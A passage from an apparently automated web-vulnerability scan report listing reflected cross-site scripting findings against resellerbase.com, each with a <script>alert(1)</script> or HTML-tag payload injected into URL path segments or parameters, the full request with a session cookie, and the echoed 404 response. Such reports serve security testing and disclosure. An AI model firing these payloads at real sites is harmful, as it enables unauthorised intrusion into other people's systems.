HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2593bf4<script>alert(1)</script>7e63dc10a1d/ was not found on this server.</p>
...[SNIP]...

2.1920. http://www.resellerbase.com/detail/25/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e1b67<script>alert(1)</script>b7f8a9d8154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25/?e1b67<script>alert(1)</script>b7f8a9d8154=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/?e1b67<script>alert(1)</script>b7f8a9d8154=1 was not found on this server.</p>
...[SNIP]...

2.1921. http://www.resellerbase.com/detail/25/grouptravelplanet-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/grouptravelplanet-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 592b4<script>alert(1)</script>365a63a9a6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail592b4<script>alert(1)</script>365a63a9a6a/25/grouptravelplanet-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail592b4<script>alert(1)</script>365a63a9a6a/25/grouptravelplanet-com.html was not found on this server.</p>
...[SNIP]...

2.1922. http://www.resellerbase.com/detail/25/grouptravelplanet-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/25/grouptravelplanet-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a7c3<a>fb9df526a50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/254a7c3<a>fb9df526a50/grouptravelplanet-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/254a7c3<a>fb9df526a50/grouptravelplanet-com.html was not found on this server.</p>
...[SNIP]...

2.1923. http://www.resellerbase.com/detail/25/grouptravelplanet-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/grouptravelplanet-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 13bb9<script>alert(1)</script>cf59bd5fb18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25/13bb9<script>alert(1)</script>cf59bd5fb18 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/13bb9<script>alert(1)</script>cf59bd5fb18 was not found on this server.</p>
...[SNIP]...

2.1924. http://www.resellerbase.com/detail/25/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 64d8d<script>alert(1)</script>3ed570b4b3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail64d8d<script>alert(1)</script>3ed570b4b3f/25/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail64d8d<script>alert(1)</script>3ed570b4b3f/25/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1925. http://www.resellerbase.com/detail/25/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a878f<script>alert(1)</script>cfd004df1b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25a878f<script>alert(1)</script>cfd004df1b1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25a878f<script>alert(1)</script>cfd004df1b1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1926. http://www.resellerbase.com/detail/25/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133cc<script>alert(1)</script>7ba310b6e8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25/search.php133cc<script>alert(1)</script>7ba310b6e8c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php133cc<script>alert(1)</script>7ba310b6e8c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1927. http://www.resellerbase.com/detail/25/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/25/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a6945<a>23587f84e74 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/25/search.php?keyword=search...&Submit3=Searcha6945<a>23587f84e74&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php?keyword=search...&Submit3=Searcha6945<a>23587f84e74&opt=2 was not found on this server.</p>
...[SNIP]...

2.1928. http://www.resellerbase.com/detail/25/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/25/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1ea54<a>5ed210c2793 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/25/search.php?keyword=search...1ea54<a>5ed210c2793&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php?keyword=search...1ea54<a>5ed210c2793&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1929. http://www.resellerbase.com/detail/25/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5c5d4<script>alert(1)</script>c985f26f321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/25/search.php?keyword=search...&Submit3=Search&opt=2&5c5d4<script>alert(1)</script>c985f26f321=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php?keyword=search...&Submit3=Search&opt=2&5c5d4<script>alert(1)</script>c985f26f321=1 was not found on this server.</p>
...[SNIP]...

2.1930. http://www.resellerbase.com/detail/25/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/25/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 59450<a>3c8b65b8991 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/25/search.php?keyword=search...&Submit3=Search&opt=259450<a>3c8b65b8991 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/25/search.php?keyword=search...&Submit3=Search&opt=259450<a>3c8b65b8991 was not found on this server.</p>
...[SNIP]...

2.1931. http://www.resellerbase.com/detail/26/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52303<script>alert(1)</script>bdad89b4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail52303<script>alert(1)</script>bdad89b4ab5/26/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail52303<script>alert(1)</script>bdad89b4ab5/26/ was not found on this server.</p>
...[SNIP]...

2.1932. http://www.resellerbase.com/detail/26/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ec4c<script>alert(1)</script>b5bbba9d324 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/262ec4c<script>alert(1)</script>b5bbba9d324/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/262ec4c<script>alert(1)</script>b5bbba9d324/ was not found on this server.</p>
...[SNIP]...

2.1933. http://www.resellerbase.com/detail/26/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bb697<script>alert(1)</script>8b55f045536 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/?bb697<script>alert(1)</script>8b55f045536=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/?bb697<script>alert(1)</script>8b55f045536=1 was not found on this server.</p>
...[SNIP]...

2.1934. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 640b1<script>alert(1)</script>f0f8ef12a1196916e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail640b1<script>alert(1)</script>f0f8ef12a1196916e/26/rating.php?id=26&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail640b1<script>alert(1)</script>f0f8ef12a1196916e/26/rating.php?id=26&rating=5 was not found on this server.</p>
...[SNIP]...

2.1935. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd0eb<script>alert(1)</script>1af1bf609c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfd0eb<script>alert(1)</script>1af1bf609c0/26/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfd0eb<script>alert(1)</script>1af1bf609c0/26/rating.php was not found on this server.</p>
...[SNIP]...

2.1936. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cac8b<script>alert(1)</script>f505c8edc0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26cac8b<script>alert(1)</script>f505c8edc0d/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26cac8b<script>alert(1)</script>f505c8edc0d/rating.php was not found on this server.</p>
...[SNIP]...

2.1937. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d037a<script>alert(1)</script>ade3535984969924a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/26d037a<script>alert(1)</script>ade3535984969924a/rating.php?id=26&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26d037a<script>alert(1)</script>ade3535984969924a/rating.php?id=26&rating=5 was not found on this server.</p>
...[SNIP]...

2.1938. http://www.resellerbase.com/detail/26/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3a33<script>alert(1)</script>b1b63546391 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/rating.phpd3a33<script>alert(1)</script>b1b63546391 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

